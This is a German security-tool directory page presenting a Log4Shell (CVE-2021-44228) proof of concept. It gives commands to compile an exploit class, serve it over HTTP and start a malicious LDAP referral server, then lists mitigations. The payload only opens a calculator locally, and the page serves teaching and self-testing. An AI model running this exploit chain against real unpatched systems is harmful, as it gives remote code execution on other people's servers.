Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) Proof of Concept | Kitploit
Tools/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) Proof of Concept

Repository anzeigen
854vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228 (Log4Shell) Proof of Concept

Die in Konfiguration, Protokollmeldungen und Parametern verwendeten JNDI-Funktionen von Apache Log4j2 <=2.14.1 schützen nicht vor Angreifer-kontrollierten LDAP- und anderen JNDI-bezogenen Endpunkten. Ein Angreifer, der Protokollmeldungen oder Parameter von Protokollmeldungen kontrollieren kann, kann beliebigen, von LDAP-Servern geladenen Code ausführen, wenn die Nachrichten-Lookup-Ersetzung aktiviert ist.

Um Kunden zu helfen, zu verstehen, wie dieser Fehler funktioniert, haben wir dieses Repository mit einem einfachen, aber funktionierenden Proof of Concept vorbereitet.

Voraussetzungen

Lokal müssen installiert sein:

  • Git
  • JDK 11
  • Maven
  • Python

Derzeit startet der beliebige Code die Calculator-Anwendung auf macOS oder Windows, daher werden von diesem PoC nur diese beiden Betriebssysteme unterstützt.

Haftungsausschluss

Alle Informationen und Codes werden ausschließlich zu Bildungszwecken und/oder zum Testen eigener Systeme auf diese Schwachstelle bereitgestellt.

Die Angriffstechnik

Dieser PoC ähnelt dem unten im Bild beschriebenen (Credit: GovCERT.ch), abgesehen von dem verwundbaren Server, der der Einfachheit halber nur eine einfache Java-Klasse ist. Es ist wichtig zu verstehen, dass diese Schwachstelle auf verschiedene Weise ausgelöst werden kann; das unten Beschriebene ist nur eine davon.

So führen Sie den PoC aus

Klonen Sie dieses Repository

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Kompilieren Sie den Exploit (mit JDK 11)

root@kitploit:~
terminal1 $ javac Exploit.java

Starten Sie einen HTTP-Server, der den Exploit bereitstellt

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Starten Sie den bösartigen LDAPRefServer (Dank an https://github.com/mbechler/marshalsec)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Starten Sie die fehlerhafte Anwendung (die Log4j 2.14.1 enthält)

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

Wenn alles gut gegangen ist, sollte die Calculator-Anwendung (beliebige Codeausführung) erscheinen

Schnelle Gegenmaßnahmen (funktionieren für Log4J-Versionen 2.10.0 bis 2.14.1)

Umgebungsvariable LOG4J_FORMAT_MSG_NO_LOOKUPS auf true setzen

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

In diesem Fall sollte die Calculator-Anwendung nicht mehr erscheinen

Führen Sie die Anwendung mit der auf true gesetzten Systemeigenschaft log4j2.formatMsgNoLookups aus

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

In diesem Fall sollte die Calculator-Anwendung nicht mehr erscheinen

Tool herunterladen